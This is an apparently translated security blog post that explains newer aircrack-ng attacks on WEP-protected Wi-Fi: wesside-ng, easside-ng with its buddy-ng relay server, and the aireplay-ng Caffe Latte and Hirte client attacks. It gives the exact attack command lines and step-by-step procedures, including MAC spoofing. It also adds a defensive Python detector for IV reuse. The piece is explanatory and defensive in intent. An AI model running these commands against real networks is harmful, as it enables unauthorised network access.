Attacks on wireless networks. Part 2

    This is a continuation of the previous article on attacks against wireless access points with WEP protection.

    In this second part of the series on wireless security, we look at some less conventional attacks on WEP.


    The latest (unstable) release of the aircrack-ng package adds several programs that implement new attacks on the WEP protocol.

    The first of these is wesside-ng. In essence, it is a script that automates key cracking. The program has several options, but to run it you only need to pass the name of the wireless interface to use:

    wesside-ng -i wlan0

    The procedure is the same as when cracking by hand:

    1. Hopping through the channels, it finds a WEP-protected network.

    2. It performs fake authentication. If MAC filtering is enabled, it changes the adapter's MAC address to one that is allowed.

    3. It associates with the access point.

    4. A fragmentation attack yields 128 bits of key stream.

    5. Once an ARP packet is captured, the IP address in its body is decrypted. From this data and the key stream, a forged ARP packet is built.

    6. The network is flooded with forged ARP packets.

    7. A PTW attack is run to compute the key.

    The second new program is easside-ng. It lets you connect to a WEP-protected wireless network without knowing the key itself.

    [Figure: work scheme of easside-ng]

    To carry out this attack, you must be able to run buddy-ng, the server-side component of easside-ng, on a host on the Internet. Both the wireless network and the computer you are attacking from must be able to reach buddy-ng. The scheme is quite simple:

    1. The longest possible key stream (1504 bits) is extracted with a fragmentation attack.

    2. By manipulating ARP packets, the addressing of the network is learned.

    3. A connection to the server is made and its operation is checked.

    From then on, to send a packet into the network, it is encrypted with the key stream and transmitted.

    Decrypting a received packet is a little more involved: first the information needed to deliver it to the server is added to it, and it is sent back into the wireless network. The access point, in turn, decrypts the packet and forwards it to the Internet. The server, on receiving the packet, sends it back to you in the clear.

    This attack is very quiet and fast, because you do not need to send tens of thousands of packets, which sets it apart from the traditional WEP attack.

    The programs are started very simply:

    On the external server: buddy-ng

    On your computer: easside-ng -f <network interface> -v -c <channel of the access point> -s <external server address>

    The last addition is a set of new options in aireplay-ng. Two new parameters make it possible to attack clients and recover a WEP key outside the range of the corresponding network:

    aireplay-ng -6 -h -D <network interface>, for the so-called Caffe Latte attack, and

    aireplay-ng -7 -h -D <network interface>, for the Hirte attack.

    Both do the same job, by slightly different methods. First, they wait for an ARP request from any client within range of the network card. Then a short piece of key stream is extracted and an ARP request is built to which the client will reply.

    Next, airodump-ng is started, packets are collected, and the key is computed with aircrack-ng.
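    As an added example (not part of the original article), here is a defender-side detection heuristic for the ARP-injection phase shared by step 6 of wesside-ng and by the Caffe Latte and Hirte client attacks: every frame forged from a single recovered key stream, or replayed verbatim, carries the same WEP IV, so a station that repeats one (MAC, IV) pair dozens of times per second stands out against normal traffic. The frame records and threshold values below are constructed for illustration.

```python
"""Flag WEP frame injection by IV reuse in a sliding time window.

A WEP injector that holds one recovered key stream can only encrypt under the
IV that key stream belongs to, and a replay attack resends a captured frame
unchanged, so the (transmitter MAC, IV) pair repeats far more often than any
legitimate station would repeat it.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class WepFrame:
    ts: float      # capture time in seconds
    src: str       # transmitter MAC address (802.11 address 2)
    iv: bytes      # 3-byte WEP initialization vector from the frame body
    length: int    # total frame length in bytes


def iv_reuse_alerts(frames, window=5.0, threshold=50):
    """Return [(src, iv_hex, peak_count)] for each station that sends the same
    IV more than `threshold` times within any `window` seconds.
    Frames must be sorted by timestamp."""
    recent = defaultdict(deque)   # (src, iv) -> timestamps inside the window
    alerts = {}
    for f in frames:
        key = (f.src, f.iv)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window:   # drop timestamps that aged out
            q.popleft()
        if len(q) > threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return [(src, iv.hex(), n) for (src, iv), n in sorted(alerts.items())]


def constructed_capture():
    """Constructed sample (not a real capture): one normal client whose IV
    advances on every frame, and one injector resending a single forged
    ARP request 300 times in three seconds."""
    frames = [WepFrame(i * 0.05, "00:11:22:33:44:55", i.to_bytes(3, "big"), 120)
              for i in range(200)]
    frames += [WepFrame(2.0 + i * 0.01, "66:77:88:99:aa:bb", b"\x4a\x3f\x01", 68)
               for i in range(300)]
    return sorted(frames, key=lambda f: f.ts)


if __name__ == "__main__":
    for src, iv, n in iv_reuse_alerts(constructed_capture()):
        print(f"IV reuse: {src} sent IV {iv} {n} times within 5 s")
```

    On a real capture the WepFrame fields come from the 802.11 header's second address field and the first three bytes of the WEP body; the detection threshold should be tuned to the traffic volume of the network being monitored.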

    Finally, it is worth noting that these new attacks only make breaking into WEP-protected Wi-Fi networks even easier. The only option today is WPA2, either PSK or Enterprise.

    In the next article, we will take a detailed look at the possibilities for attacking WPA-protected networks, as well as a new attack on WPA-TKIP, and try to answer the question of whether WPA can still give full confidence in the security of your wireless network.

    Posted by Kozhara Yaroslav, Glaive Security Group
